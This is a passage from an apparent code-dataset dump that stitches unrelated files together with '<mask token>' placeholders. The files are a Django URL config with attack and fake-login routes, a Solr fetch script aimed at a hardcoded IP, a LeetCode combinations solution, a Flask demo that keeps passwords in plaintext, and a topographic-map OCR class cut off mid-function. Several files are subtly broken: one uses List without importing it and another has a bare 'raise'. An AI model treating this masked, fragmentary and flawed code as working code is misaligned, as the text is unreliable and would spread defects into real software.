"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [url('^$', views.index_view, name='accounts.index'), url(\n '^login/$', views.login_view, name='accounts.login'), url('^logout/$',\n views.logout_view, name='accounts.logout'), url('^registro/$', views.\n registro_usuario_view, name='accounts.registro'), url(\n 'obrigado/(?P<username>[\\\\w]+)/$', views.obrigado_view, name=\n 'accounts.obrigado'), url('^ataque/$', views.ataque_view, name=\n 'accounts.ataque'), url('^flpositivo/$', views.falsoLoginPositivo_view,\n name='accounts.flpositivo'), url('^flnegativo/$', views.\n falsoLoginNegativo_view, name='accounts.flnegativo')]\n",
"step-3": "from django.conf.urls import url\nfrom . import views\nurlpatterns = [url('^$', views.index_view, name='accounts.index'), url(\n '^login/$', views.login_view, name='accounts.login'), url('^logout/$',\n views.logout_view, name='accounts.logout'), url('^registro/$', views.\n registro_usuario_view, name='accounts.registro'), url(\n 'obrigado/(?P<username>[\\\\w]+)/$', views.obrigado_view, name=\n 'accounts.obrigado'), url('^ataque/$', views.ataque_view, name=\n 'accounts.ataque'), url('^flpositivo/$', views.falsoLoginPositivo_view,\n name='accounts.flpositivo'), url('^flnegativo/$', views.\n falsoLoginNegativo_view, name='accounts.flnegativo')]\n",
"step-4": "from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index_view, name='accounts.index'),\n url(r'^login/$', views.login_view, name='accounts.login'),\n url(r'^logout/$', views.logout_view, name='accounts.logout'),\n url(r'^registro/$', views.registro_usuario_view, name='accounts.registro'),\n url(r'obrigado/(?P<username>[\\w]+)/$', views.obrigado_view, name='accounts.obrigado'),\n url(r'^ataque/$', views.ataque_view, name='accounts.ataque'),\n url(r'^flpositivo/$', views.falsoLoginPositivo_view, name='accounts.flpositivo'),\n url(r'^flnegativo/$', views.falsoLoginNegativo_view, name='accounts.flnegativo'),\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import requests
import json
import hashlib
import os
def pull_from_solr(output_directory):
solr_url = 'http://54.191.81.42:8888/solr/collection1/select?q=*%3A*&wt=json&indent=true'
# TODO: ask about auth for this
req = requests.get(solr_url)
if req.status_code != 200:
raise
new_data = req.json()
for doc in new_data['response']['docs']:
doc_url = doc['url']
doc_sha = hashlib.sha224(doc_url).hexdigest()
doc.update({"sha": doc_sha})
with open(os.path.join(output_directory, '%s.json' % doc_sha), 'w') as f:
f.write(json.dumps(doc, indent=4))
|
normal
|
{
"blob_id": "47b40e4311f76cd620b7c6ed6b39216d866fa857",
"index": 8530,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef pull_from_solr(output_directory):\n solr_url = (\n 'http://54.191.81.42:8888/solr/collection1/select?q=*%3A*&wt=json&indent=true'\n )\n req = requests.get(solr_url)\n if req.status_code != 200:\n raise\n new_data = req.json()\n for doc in new_data['response']['docs']:\n doc_url = doc['url']\n doc_sha = hashlib.sha224(doc_url).hexdigest()\n doc.update({'sha': doc_sha})\n with open(os.path.join(output_directory, '%s.json' % doc_sha), 'w'\n ) as f:\n f.write(json.dumps(doc, indent=4))\n",
"step-3": "import requests\nimport json\nimport hashlib\nimport os\n\n\ndef pull_from_solr(output_directory):\n solr_url = (\n 'http://54.191.81.42:8888/solr/collection1/select?q=*%3A*&wt=json&indent=true'\n )\n req = requests.get(solr_url)\n if req.status_code != 200:\n raise\n new_data = req.json()\n for doc in new_data['response']['docs']:\n doc_url = doc['url']\n doc_sha = hashlib.sha224(doc_url).hexdigest()\n doc.update({'sha': doc_sha})\n with open(os.path.join(output_directory, '%s.json' % doc_sha), 'w'\n ) as f:\n f.write(json.dumps(doc, indent=4))\n",
"step-4": "import requests\nimport json\nimport hashlib\nimport os\n\n\ndef pull_from_solr(output_directory):\n solr_url = 'http://54.191.81.42:8888/solr/collection1/select?q=*%3A*&wt=json&indent=true'\n\n # TODO: ask about auth for this\n req = requests.get(solr_url)\n\n if req.status_code != 200:\n raise\n\n new_data = req.json()\n\n for doc in new_data['response']['docs']:\n doc_url = doc['url']\n doc_sha = hashlib.sha224(doc_url).hexdigest()\n doc.update({\"sha\": doc_sha})\n\n with open(os.path.join(output_directory, '%s.json' % doc_sha), 'w') as f:\n f.write(json.dumps(doc, indent=4))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def combine(self, n: int, k: int) ->List[List[int]]:
if k == 0:
return [[]]
ans = []
for i in range(k, n + 1):
for temp_ans in self.combine(i - 1, k - 1):
ans.append(temp_ans + [i])
return ans
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import sys
class Solution:
def combine(self, n: int, k: int) ->List[List[int]]:
if k == 0:
return [[]]
ans = []
for i in range(k, n + 1):
for temp_ans in self.combine(i - 1, k - 1):
ans.append(temp_ans + [i])
return ans
<|reserved_special_token_0|>
<|reserved_special_token_1|>
# Problem No.: 77
# Solver: Jinmin Goh
# Date: 20191230
# URL: https://leetcode.com/problems/combinations/
import sys
class Solution:
def combine(self, n: int, k: int) -> List[List[int]]:
if k == 0:
return [[]]
ans = []
for i in range(k, n + 1) :
for temp_ans in self.combine(i - 1, k - 1):
ans.append(temp_ans + [i])
return ans
"""
# correct for 26/27 and TLE
class Solution:
def combine(self, n: int, k: int) -> List[List[int]]:
if k == 0:
return [[]]
if n < k:
return []
nList = [i + 1 for i in range(n)]
if n == k:
return [nList]
if n == k:
return [[i + 1] for i in range(n)]
self.ans = []
if n//2 > k:
self.makeFunc(nList[:], k, [])
else:
self.delFunc(n-k, nList)
return self.ans
def makeFunc(self, nList: list, k: int, temp_ans: list) -> None:
if k == 0:
temp_ans.sort()
if temp_ans not in self.ans:
self.ans.append(temp_ans)
return
else:
return
else:
for i in range(len(nList)):
temp = nList[:]
temp_temp_ans = temp_ans[:]
temp_temp_ans.append(nList[i])
temp.pop(i)
self.makeFunc(temp[:], k-1, temp_temp_ans[:])
def delFunc(self, k: int, temp_ans: list) -> None:
if k == 0:
temp_ans.sort()
if temp_ans not in self.ans:
self.ans.append(temp_ans)
return
else:
return
else:
for i in range(len(temp_ans)):
temp = temp_ans[:]
temp.pop(i)
self.delFunc(k-1, temp[:])
"""
|
flexible
|
{
"blob_id": "e4a2c605ef063eee46880515dfff05562916ab81",
"index": 9976,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def combine(self, n: int, k: int) ->List[List[int]]:\n if k == 0:\n return [[]]\n ans = []\n for i in range(k, n + 1):\n for temp_ans in self.combine(i - 1, k - 1):\n ans.append(temp_ans + [i])\n return ans\n\n\n<mask token>\n",
"step-4": "import sys\n\n\nclass Solution:\n\n def combine(self, n: int, k: int) ->List[List[int]]:\n if k == 0:\n return [[]]\n ans = []\n for i in range(k, n + 1):\n for temp_ans in self.combine(i - 1, k - 1):\n ans.append(temp_ans + [i])\n return ans\n\n\n<mask token>\n",
"step-5": "# Problem No.: 77\n# Solver: Jinmin Goh\n# Date: 20191230\n# URL: https://leetcode.com/problems/combinations/\n\nimport sys\n\nclass Solution:\n def combine(self, n: int, k: int) -> List[List[int]]:\n if k == 0:\n return [[]]\n ans = []\n for i in range(k, n + 1) :\n for temp_ans in self.combine(i - 1, k - 1):\n ans.append(temp_ans + [i])\n return ans\n\n\"\"\"\n# correct for 26/27 and TLE\nclass Solution:\n def combine(self, n: int, k: int) -> List[List[int]]:\n if k == 0:\n return [[]]\n if n < k:\n return []\n nList = [i + 1 for i in range(n)]\n if n == k:\n return [nList]\n if n == k:\n return [[i + 1] for i in range(n)]\n self.ans = []\n if n//2 > k:\n self.makeFunc(nList[:], k, [])\n else:\n self.delFunc(n-k, nList)\n return self.ans\n \n def makeFunc(self, nList: list, k: int, temp_ans: list) -> None:\n if k == 0:\n temp_ans.sort()\n if temp_ans not in self.ans:\n self.ans.append(temp_ans)\n return\n else:\n return\n else:\n for i in range(len(nList)):\n temp = nList[:]\n temp_temp_ans = temp_ans[:]\n temp_temp_ans.append(nList[i])\n temp.pop(i)\n self.makeFunc(temp[:], k-1, temp_temp_ans[:])\n def delFunc(self, k: int, temp_ans: list) -> None:\n if k == 0:\n temp_ans.sort()\n if temp_ans not in self.ans:\n self.ans.append(temp_ans)\n return\n else:\n return\n else:\n for i in range(len(temp_ans)):\n temp = temp_ans[:]\n temp.pop(i)\n self.delFunc(k-1, temp[:])\n \"\"\"",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Auth:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.route('/welcome/<username>/suffix/<message>')
def welcome(username, message):
return jsonify({'comment': f'Hello {username}, {message}!'})
class Auth:
def __init__(self, user: str, pass_: str):
self.user = user
self.pass_ = pass_
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.route('/status')
def get_json_data():
return jsonify({'comment': f'App działa OK; magic:{magic}'})
@app.route('/compute')
def compute():
a = int(request.args.get('a'))
b = int(request.args.get('b'))
print(f'request a={a}, thread:{threading.current_thread().name}')
time.sleep(10.0)
if b == 0:
return jsonify({'comment': 'b==0, cannot divide'}), 400
return jsonify({'sum': a + b, 'difference': a - b, 'division': a / b})
@app.route('/welcome/<username>/suffix/<message>')
def welcome(username, message):
return jsonify({'comment': f'Hello {username}, {message}!'})
class Auth:
def __init__(self, user: str, pass_: str):
self.user = user
self.pass_ = pass_
<|reserved_special_token_0|>
@app.route('/user/create', methods=['POST'])
def create_user():
data = request.json
k = Auth(**data)
if users.keys().__contains__(k.user):
return jsonify({'comment': 'This user name already exists!'}), 400
users[k.user] = k
return jsonify(k.__dict__)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import json
import time
from typing import Dict
import threading
<|reserved_special_token_0|>
from flask import Flask, jsonify, request
app = Flask(__name__)
with open('config.json', 'r') as f:
loaded = json.load(f)
magic = loaded['magic']
@app.route('/status')
def get_json_data():
return jsonify({'comment': f'App działa OK; magic:{magic}'})
@app.route('/compute')
def compute():
a = int(request.args.get('a'))
b = int(request.args.get('b'))
print(f'request a={a}, thread:{threading.current_thread().name}')
time.sleep(10.0)
if b == 0:
return jsonify({'comment': 'b==0, cannot divide'}), 400
return jsonify({'sum': a + b, 'difference': a - b, 'division': a / b})
@app.route('/welcome/<username>/suffix/<message>')
def welcome(username, message):
return jsonify({'comment': f'Hello {username}, {message}!'})
class Auth:
def __init__(self, user: str, pass_: str):
self.user = user
self.pass_ = pass_
users: Dict[str, Auth] = {}
@app.route('/user/create', methods=['POST'])
def create_user():
data = request.json
k = Auth(**data)
if users.keys().__contains__(k.user):
return jsonify({'comment': 'This user name already exists!'}), 400
users[k.user] = k
return jsonify(k.__dict__)
app.run(host='localhost', port=5001, debug=None, load_dotenv=False)
<|reserved_special_token_1|>
import json
import time
from typing import Dict
import threading
"""
Note: każdy request uruchamia osobny wątek.
Przegląd: `top -H -p <process_id>`
"""
from flask import Flask, jsonify, request
app = Flask(__name__)
# https://www.tutorialspoint.com/flask/flask_http_methods.htm
# ładowanie konfiguracji aplikacji (opcjonalne, ale to dobry pomysł);
# po zbudowaniu aplikacji (poniżej) file "config.json" powinien się znajdować w folderze aplikacji
with open('config.json', 'r') as f:
loaded = json.load(f)
magic = loaded['magic']
@app.route('/status')
def get_json_data():
return jsonify({'comment': f'App działa OK; magic:{magic}'})
# dostępna pod: http://localhost:5001/compute?a=10&b=0
@app.route('/compute')
def compute():
a = int(request.args.get('a'))
b = int(request.args.get('b'))
print(f'request a={a}, thread:{threading.current_thread().name}')
time.sleep(10.0)
if b == 0:
# teraz zwracamy komunikat o błędzie, oraz http error-code 400 (BAD_REQUEST)
return jsonify({'comment': 'b==0, cannot divide'}), 400
return jsonify({'sum': a + b, 'difference': a - b, 'division': a / b})
# dostępna pod: http://localhost:5001/welcome/roadrunner/suffix/nice%20to%20meet%20you
@app.route('/welcome/<username>/suffix/<message>')
def welcome(username, message):
return jsonify({'comment': f'Hello {username}, {message}!'})
class Auth:
def __init__(self, user: str, pass_: str):
self.user = user
self.pass_ = pass_
# zadanie -> zbierać userów w jakieś strukturze (np. liście 'users', albo Dict lub Set),
# i zwrócić błąd jeśli tworzymy usera, którego pole "user" już zostało "zajęte"
# rozwiązanie:
users: Dict[str, Auth] = {}
# dostępna per Postman (trzeba zrobić zapytanie POST):
# localhost:5001/user/create
# w sekcji "body" trzba dać "raw -> JSON", i w polu JSON dodać:
# {
# "user": "Xi Wuhan",
# "pass_": "123"
# }
@app.route('/user/create', methods=['POST'])
def create_user():
data = request.json
k = Auth(**data)
if users.keys().__contains__(k.user):
return jsonify({'comment': 'This user name already exists!'}), 400
users[k.user] = k
return jsonify(k.__dict__)
app.run(host='localhost', port=5001, debug=None, load_dotenv=False) # can skip all args
# możliwa kompilacja do pojedynczego pliku wykonywalnego:
# `pyinstaller _zero.py -n my_flask_app --onefile
|
flexible
|
{
"blob_id": "8fcc2a13fd5a803e2d755a567c78c8274bd88aad",
"index": 7283,
"step-1": "<mask token>\n\n\nclass Auth:\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/welcome/<username>/suffix/<message>')\ndef welcome(username, message):\n return jsonify({'comment': f'Hello {username}, {message}!'})\n\n\nclass Auth:\n\n def __init__(self, user: str, pass_: str):\n self.user = user\n self.pass_ = pass_\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\[email protected]('/status')\ndef get_json_data():\n return jsonify({'comment': f'App działa OK; magic:{magic}'})\n\n\[email protected]('/compute')\ndef compute():\n a = int(request.args.get('a'))\n b = int(request.args.get('b'))\n print(f'request a={a}, thread:{threading.current_thread().name}')\n time.sleep(10.0)\n if b == 0:\n return jsonify({'comment': 'b==0, cannot divide'}), 400\n return jsonify({'sum': a + b, 'difference': a - b, 'division': a / b})\n\n\[email protected]('/welcome/<username>/suffix/<message>')\ndef welcome(username, message):\n return jsonify({'comment': f'Hello {username}, {message}!'})\n\n\nclass Auth:\n\n def __init__(self, user: str, pass_: str):\n self.user = user\n self.pass_ = pass_\n\n\n<mask token>\n\n\[email protected]('/user/create', methods=['POST'])\ndef create_user():\n data = request.json\n k = Auth(**data)\n if users.keys().__contains__(k.user):\n return jsonify({'comment': 'This user name already exists!'}), 400\n users[k.user] = k\n return jsonify(k.__dict__)\n\n\n<mask token>\n",
"step-4": "import json\nimport time\nfrom typing import Dict\nimport threading\n<mask token>\nfrom flask import Flask, jsonify, request\napp = Flask(__name__)\nwith open('config.json', 'r') as f:\n loaded = json.load(f)\n magic = loaded['magic']\n\n\[email protected]('/status')\ndef get_json_data():\n return jsonify({'comment': f'App działa OK; magic:{magic}'})\n\n\[email protected]('/compute')\ndef compute():\n a = int(request.args.get('a'))\n b = int(request.args.get('b'))\n print(f'request a={a}, thread:{threading.current_thread().name}')\n time.sleep(10.0)\n if b == 0:\n return jsonify({'comment': 'b==0, cannot divide'}), 400\n return jsonify({'sum': a + b, 'difference': a - b, 'division': a / b})\n\n\[email protected]('/welcome/<username>/suffix/<message>')\ndef welcome(username, message):\n return jsonify({'comment': f'Hello {username}, {message}!'})\n\n\nclass Auth:\n\n def __init__(self, user: str, pass_: str):\n self.user = user\n self.pass_ = pass_\n\n\nusers: Dict[str, Auth] = {}\n\n\[email protected]('/user/create', methods=['POST'])\ndef create_user():\n data = request.json\n k = Auth(**data)\n if users.keys().__contains__(k.user):\n return jsonify({'comment': 'This user name already exists!'}), 400\n users[k.user] = k\n return jsonify(k.__dict__)\n\n\napp.run(host='localhost', port=5001, debug=None, load_dotenv=False)\n",
"step-5": "import json\nimport time\nfrom typing import Dict\nimport threading\n\n\"\"\"\n Note: każdy request uruchamia osobny wątek. \n Przegląd: `top -H -p <process_id>`\n\"\"\"\n\n\nfrom flask import Flask, jsonify, request\n\napp = Flask(__name__)\n\n# https://www.tutorialspoint.com/flask/flask_http_methods.htm\n\n# ładowanie konfiguracji aplikacji (opcjonalne, ale to dobry pomysł);\n# po zbudowaniu aplikacji (poniżej) file \"config.json\" powinien się znajdować w folderze aplikacji\nwith open('config.json', 'r') as f:\n loaded = json.load(f)\n magic = loaded['magic']\n\n\[email protected]('/status')\ndef get_json_data():\n return jsonify({'comment': f'App działa OK; magic:{magic}'})\n\n\n# dostępna pod: http://localhost:5001/compute?a=10&b=0\[email protected]('/compute')\ndef compute():\n a = int(request.args.get('a'))\n b = int(request.args.get('b'))\n print(f'request a={a}, thread:{threading.current_thread().name}')\n time.sleep(10.0)\n if b == 0:\n # teraz zwracamy komunikat o błędzie, oraz http error-code 400 (BAD_REQUEST)\n return jsonify({'comment': 'b==0, cannot divide'}), 400\n return jsonify({'sum': a + b, 'difference': a - b, 'division': a / b})\n\n\n# dostępna pod: http://localhost:5001/welcome/roadrunner/suffix/nice%20to%20meet%20you\[email protected]('/welcome/<username>/suffix/<message>')\ndef welcome(username, message):\n return jsonify({'comment': f'Hello {username}, {message}!'})\n\n\nclass Auth:\n def __init__(self, user: str, pass_: str):\n self.user = user\n self.pass_ = pass_\n\n\n# zadanie -> zbierać userów w jakieś strukturze (np. liście 'users', albo Dict lub Set),\n# i zwrócić błąd jeśli tworzymy usera, którego pole \"user\" już zostało \"zajęte\"\n# rozwiązanie:\n\nusers: Dict[str, Auth] = {}\n\n\n# dostępna per Postman (trzeba zrobić zapytanie POST):\n# localhost:5001/user/create\n# w sekcji \"body\" trzba dać \"raw -> JSON\", i w polu JSON dodać:\n# {\n# \t\"user\": \"Xi Wuhan\",\n# \t\"pass_\": \"123\"\n# }\[email protected]('/user/create', methods=['POST'])\ndef create_user():\n data = request.json\n k = Auth(**data)\n if users.keys().__contains__(k.user):\n return jsonify({'comment': 'This user name already exists!'}), 400\n users[k.user] = k\n return jsonify(k.__dict__)\n\n\napp.run(host='localhost', port=5001, debug=None, load_dotenv=False) # can skip all args\n\n# możliwa kompilacja do pojedynczego pliku wykonywalnego:\n# `pyinstaller _zero.py -n my_flask_app --onefile\n",
"step-ids": [
1,
3,
6,
9,
10
]
}
|
[
1,
3,
6,
9,
10
] |
import cv2
import pytesseract
import os
from PIL import Image
import numpy as np
from helper_functions import Helper
class ImageData:
# multipliers to get portion of image with interval value
__bottom_thresh = 0.9
__left_thresh = 0.35
__right_thresh = 0.65
# (words, offset) to contour interval value
__words_offsets = [("CONTOUR", 2), ("INTERVAL", 1), ("FEET", -1)]
__resize_factor = 6
def __init__(self, image):
self.image = image
# self.sub_image = self.__get_sub_image()
# word_list, box_list = self.__get_words()
# self.word_list = word_list
# self.box_list = box_list
self._contour_interval_dist = None
self._feet_per_pixel = None
def __get_sub_image(self):
rows, cols, chan = self.image.shape
sub_image = self.image[
int(self.__bottom_thresh*rows):rows, # bottom rows
int(self.__left_thresh*cols):int(self.__right_thresh*cols) # middle rows
]
sub_image = cv2.resize(sub_image, None, fx=self.__resize_factor, fy=self.__resize_factor,
interpolation = cv2.INTER_LINEAR)
sub_image = Helper.convert_image_to_mask(sub_image)
gray_denoised_image = cv2.fastNlMeansDenoising(sub_image, None, 5, 7, 21)
threshold_image = cv2.threshold(gray_denoised_image,225,255,cv2.THRESH_BINARY_INV)[1]
return sub_image
def __get_countour_interval_dist(self):
candidates = []
for word, offset in self.__words_offsets:
candidates += self.__find_candidates_for_id_and_index(self.word_list, word, offset)
return candidates[0][1] if len(candidates) > 0 else 40
def __get_feet_per_pixel(self):
# row_size = 6
# total = int(len(self.box_list) / 6)
# idx = 0
# nums = [(idx, int(char)) for idx, char in enumerate(self.box_list)
# if idx % row_size == 0 and char.isdigit() and int(char) > 2 and int(char) < 10]
# nums.sort(key=lambda val: self.box_list[val[0] + 2])
# threshold = 3
# prev_x = -1
# prev_y = -2 * threshold
# prev_num = -1
# img = self.sub_image.copy()
# lsd = cv2.createLineSegmentDetector(0)
# lines = lsd.detect(img)[0]
# drawn_img = lsd.drawSegments(img,lines)
# cv2.imshow("LSD",drawn_img )
# # h, w, _ = img.shape
# # for (idx, num) in nums:
# # cur_x = int(self.box_list[idx + 1])
# # cur_y = int(self.box_list[idx + 2])
# # cur_x2 = int(self.box_list[idx + 3])
# # cur_y2 = int(self.box_list[idx + 4])
# # print(str(num) + ": " + str(cur_x) + ", " + str(cur_y) + " :: " + str(cur_x2) + ", " + str(cur_y2))
# # img = cv2.rectangle(img,(cur_x,h-cur_y),(cur_x2,h-cur_y2),(255,0,0),2)
# # # if abs(cur_y - prev_y) < threshold:
# # # dist = abs(cur_x - cur_y)
# # # diff = abs(num - prev_num)
# # # print("possibility found ^\n--------")
# # # prev_x = cur_x
# # # prev_y = cur_y
# # # prev_num = num
# img = cv2.resize(img, None, fx=1/6, fy=1/6,
# interpolation = cv2.INTER_LINEAR)
# cv2.imshow("blah", img)
# print(nums)
return 5280 / 790# hardcoded estimatem, ft per mile / pixel per mile = feet per pixel
def __find_candidates_for_id_and_index(self, word_list, id_word, offset):
candidates = []
indices = [i for i, x in enumerate(word_list) if x.upper() == id_word]
for i in indices:
if word_list[i+offset].isnumeric():
cand = (i, int(word_list[i+offset]))
candidates.append(cand)
return candidates
def __get_words(self):
filename = "{}.png".format(os.getpid())
cv2.imwrite(filename, self.sub_image)
words = pytesseract.image_to_string(Image.open(filename))
boxes = pytesseract.image_to_string(Image.open(filename), boxes=True, config="hocr")
os.remove(filename)
word_list = words.split()
box_list = boxes.split()
return word_list, box_list
@property
def contour_interval_dist(self):
# if self._contour_interval_dist is None:
# self._contour_interval_dist = self.__get_countour_interval_dist()
# return self._contour_interval_dist
# return 40
return 40
@contour_interval_dist.setter
def contour_interval_dist(self, value):
self._contour_interval_dist = value
@property
def feet_per_pixel(self):
if self._feet_per_pixel is None:
self._feet_per_pixel = self.__get_feet_per_pixel()
return self._feet_per_pixel
@feet_per_pixel.setter
def feet_per_pixel(self, value):
self._feet_per_pixel = value
class TopographicMap:
def __init__(self, filename):
self.filename = filename
self.image = cv2.imread(filename, 1)[500:-550, 500:-500]
# self.image = cv2.imread(filename, 1)#[500:-550, 500:-500]
self.image_data = ImageData(self.image)
self.height, self.width, self.channels = self.image.shape
if __name__ == '__main__':
# img = Topographic_Map("SanLuisObispo.jpg")
import numpy as np
import time
image = cv2.imread('maps/SanLuisObispo.jpg', 1)[500:1000, 500:1300]
r, c, chan = image.shape
tl = image[:int(r/2), :int(c/2)]
tr = image[:int(r/2), int(c/2):]
bl = image[int(r/2):, :int(c/2)]
br = image[int(r/2):, int(c/2):]
s = time.time()
img = cv2.fastNlMeansDenoising(image, None, 5, 7, 21)
e = time.time()
print("total image: " + str(e-s))
s = time.time()
tl = cv2.fastNlMeansDenoising(tl, None, 5, 7, 21)
tr = cv2.fastNlMeansDenoising(tr, None, 5, 7, 21)
bl = cv2.fastNlMeansDenoising(bl, None, 5, 7, 21)
br = cv2.fastNlMeansDenoising(br, None, 5, 7, 21)
e = time.time()
top = np.concatenate((tl, tr), axis=1)
bottom = np.concatenate((bl, br), axis=1)
new_image = np.concatenate((top, bottom), axis=0)
print("partitioned image: " + str(e-s))
cv2.imshow('img', img)
cv2.imshow('new_image', new_image)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
normal
|
{
"blob_id": "d3be26d56b3597a5d9e3a870b735a30d90d1e501",
"index": 8165,
"step-1": "<mask token>\n\n\nclass ImageData:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, image):\n self.image = image\n self._contour_interval_dist = None\n self._feet_per_pixel = None\n <mask token>\n\n def __get_countour_interval_dist(self):\n candidates = []\n for word, offset in self.__words_offsets:\n candidates += self.__find_candidates_for_id_and_index(self.\n word_list, word, offset)\n return candidates[0][1] if len(candidates) > 0 else 40\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @property\n def feet_per_pixel(self):\n if self._feet_per_pixel is None:\n self._feet_per_pixel = self.__get_feet_per_pixel()\n return self._feet_per_pixel\n <mask token>\n\n\nclass TopographicMap:\n\n def __init__(self, filename):\n self.filename = filename\n self.image = cv2.imread(filename, 1)[500:-550, 500:-500]\n self.image_data = ImageData(self.image)\n self.height, self.width, self.channels = self.image.shape\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ImageData:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, image):\n self.image = image\n self._contour_interval_dist = None\n self._feet_per_pixel = None\n\n def __get_sub_image(self):\n rows, cols, chan = self.image.shape\n sub_image = self.image[int(self.__bottom_thresh * rows):rows, int(\n self.__left_thresh * cols):int(self.__right_thresh * cols)]\n sub_image = cv2.resize(sub_image, None, fx=self.__resize_factor, fy\n =self.__resize_factor, interpolation=cv2.INTER_LINEAR)\n sub_image = Helper.convert_image_to_mask(sub_image)\n gray_denoised_image = cv2.fastNlMeansDenoising(sub_image, None, 5, \n 7, 21)\n threshold_image = cv2.threshold(gray_denoised_image, 225, 255, cv2.\n THRESH_BINARY_INV)[1]\n return sub_image\n\n def __get_countour_interval_dist(self):\n candidates = []\n for word, offset in self.__words_offsets:\n candidates += self.__find_candidates_for_id_and_index(self.\n word_list, word, offset)\n return candidates[0][1] if len(candidates) > 0 else 40\n <mask token>\n\n def __find_candidates_for_id_and_index(self, word_list, id_word, offset):\n candidates = []\n indices = [i for i, x in enumerate(word_list) if x.upper() == id_word]\n for i in indices:\n if word_list[i + offset].isnumeric():\n cand = i, int(word_list[i + offset])\n candidates.append(cand)\n return candidates\n <mask token>\n\n @property\n def contour_interval_dist(self):\n return 40\n\n @contour_interval_dist.setter\n def contour_interval_dist(self, value):\n self._contour_interval_dist = value\n\n @property\n def feet_per_pixel(self):\n if self._feet_per_pixel is None:\n self._feet_per_pixel = self.__get_feet_per_pixel()\n return self._feet_per_pixel\n <mask token>\n\n\nclass TopographicMap:\n\n def __init__(self, filename):\n self.filename = filename\n self.image = cv2.imread(filename, 1)[500:-550, 500:-500]\n self.image_data = ImageData(self.image)\n self.height, self.width, self.channels = self.image.shape\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ImageData:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, image):\n self.image = image\n self._contour_interval_dist = None\n self._feet_per_pixel = None\n\n def __get_sub_image(self):\n rows, cols, chan = self.image.shape\n sub_image = self.image[int(self.__bottom_thresh * rows):rows, int(\n self.__left_thresh * cols):int(self.__right_thresh * cols)]\n sub_image = cv2.resize(sub_image, None, fx=self.__resize_factor, fy\n =self.__resize_factor, interpolation=cv2.INTER_LINEAR)\n sub_image = Helper.convert_image_to_mask(sub_image)\n gray_denoised_image = cv2.fastNlMeansDenoising(sub_image, None, 5, \n 7, 21)\n threshold_image = cv2.threshold(gray_denoised_image, 225, 255, cv2.\n THRESH_BINARY_INV)[1]\n return sub_image\n\n def __get_countour_interval_dist(self):\n candidates = []\n for word, offset in self.__words_offsets:\n candidates += self.__find_candidates_for_id_and_index(self.\n word_list, word, offset)\n return candidates[0][1] if len(candidates) > 0 else 40\n <mask token>\n\n def __find_candidates_for_id_and_index(self, word_list, id_word, offset):\n candidates = []\n indices = [i for i, x in enumerate(word_list) if x.upper() == id_word]\n for i in indices:\n if word_list[i + offset].isnumeric():\n cand = i, int(word_list[i + offset])\n candidates.append(cand)\n return candidates\n <mask token>\n\n @property\n def contour_interval_dist(self):\n return 40\n\n @contour_interval_dist.setter\n def contour_interval_dist(self, value):\n self._contour_interval_dist = value\n\n @property\n def feet_per_pixel(self):\n if self._feet_per_pixel is None:\n self._feet_per_pixel = self.__get_feet_per_pixel()\n return self._feet_per_pixel\n\n @feet_per_pixel.setter\n def feet_per_pixel(self, value):\n self._feet_per_pixel = value\n\n\nclass TopographicMap:\n\n def __init__(self, filename):\n self.filename = filename\n self.image = cv2.imread(filename, 1)[500:-550, 500:-500]\n self.image_data = ImageData(self.image)\n self.height, self.width, self.channels = self.image.shape\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass ImageData:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, image):\n self.image = image\n self._contour_interval_dist = None\n self._feet_per_pixel = None\n\n def __get_sub_image(self):\n rows, cols, chan = self.image.shape\n sub_image = self.image[int(self.__bottom_thresh * rows):rows, int(\n self.__left_thresh * cols):int(self.__right_thresh * cols)]\n sub_image = cv2.resize(sub_image, None, fx=self.__resize_factor, fy\n =self.__resize_factor, interpolation=cv2.INTER_LINEAR)\n sub_image = Helper.convert_image_to_mask(sub_image)\n gray_denoised_image = cv2.fastNlMeansDenoising(sub_image, None, 5, \n 7, 21)\n threshold_image = cv2.threshold(gray_denoised_image, 225, 255, cv2.\n THRESH_BINARY_INV)[1]\n return sub_image\n\n def __get_countour_interval_dist(self):\n candidates = []\n for word, offset in self.__words_offsets:\n candidates += self.__find_candidates_for_id_and_index(self.\n word_list, word, offset)\n return candidates[0][1] if len(candidates) > 0 else 40\n <mask token>\n\n def __find_candidates_for_id_and_index(self, word_list, id_word, offset):\n candidates = []\n indices = [i for i, x in enumerate(word_list) if x.upper() == id_word]\n for i in indices:\n if word_list[i + offset].isnumeric():\n cand = i, int(word_list[i + offset])\n candidates.append(cand)\n return candidates\n\n def __get_words(self):\n filename = '{}.png'.format(os.getpid())\n cv2.imwrite(filename, self.sub_image)\n words = pytesseract.image_to_string(Image.open(filename))\n boxes = pytesseract.image_to_string(Image.open(filename), boxes=\n True, config='hocr')\n 